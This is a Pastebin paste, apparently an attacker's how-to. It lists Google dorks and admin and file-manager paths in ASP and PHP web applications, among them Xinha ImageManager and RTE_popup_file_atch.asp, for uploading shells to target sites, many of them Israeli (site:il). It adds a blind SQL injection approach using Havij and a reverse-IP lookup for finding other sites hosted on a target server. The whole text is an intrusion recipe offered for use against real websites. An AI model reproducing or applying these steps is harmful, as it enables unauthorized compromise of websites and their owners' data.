Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 1). Expolits:-
- site.com/rte/RTE_popup_file_atch.asp
- site.com/admin/RTE_popup_file_atch.asp
- 2). Go to google and type one of the following dorks.
- inurl:rte/my_documents/my_files
- inurl:/my_documents/my_files/
- 3). Open any site ..say
- site.com/rte/my_documents/my_files/
- 4). Now replace every thing after site.com with
- rte/RTE_popup_file_atch.asp
- so it will look like-
- site.com/rte/RTE_popup_file_atch.asp
- 1.)1). First 0Day Shell Upload ASP | PHP
- # Google Dork -|-
- 'prod1.aspx?pid=' site:il or You can also create your own Dork
- # Exploit Upload 1 -|-
- /admin/adminbanners.aspx
- # Exploit Upload 2 -|-
- /admin/AdminPics.aspx
- 2). Second 0day Upload
- # Dork -|-
- inurl:/index.php?categoryID= site:il
- inurl:/index.php?ukey=auth
- inurl:/index.php?ukey=feedback
- inurl:/index.php?ukey=pricelist
- inurl:/index.php?ukey=auxpage_faq
- inurl:/shop/index.php?categoryID=
- inurl:ukey=product&productID=
- # Exploit -|-
- /published/common/html/xinha/plugins/ImageManager/manager.php
- #Exploit -|-
- /published/common/html/xinha/plugins/ExtendedFileManager/manager.php
- 3). Third 0day Upload Blind Sql Injection
- This just Targets with havij or manually and admin page of the script is www.target.co.il/QAdmin
- # Dork -|-
- intext:cybercity site:il
- inurl:index.php?id= <-- Page 4
- intext:medicine site:il
- inurl:index.php?id= <-- page 2
- Image exploit
- inurl:simple-upload-53.php
- 1). Get I.P. Address
- First step is to get a I.P. address of a Website or a Server which you wanna hack. So for this we have to ping our target. To do this..
- Go to start
- Open CMD
- and type :-
- ping www.yourtarget.com
- So, now you have Ip Address of your Target..
- 2). Search for Websites hosted on Targeted Server.
- Now our second Step is to search for vulnerabilities in your targeted server or a website..So for this you have to do is:-
- Go to www.bing.com
- And in the search box type:-
- ip:[targets I.P server]
- Example:- ip:74.145.128.97
- Now by doing this will Display all the websites hosted on your targeted server..
- 3). Search for vulnerabilities..
- Now third step is to search for vulnerabilities..So for this you can use normal dorks such as .php?id= for SQL Injection Vulnerable websites or you can also try any other exploit. Example:-
- ip:74.145.128.97 .php?id=
- Now try to find a injectable hole or vulnerability in And hack into the Server or A website. That's it :)
- You can do the same if you have other bugs for joomla and other scripts. This method might be old, but its still works as gold. I hope it helps..
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement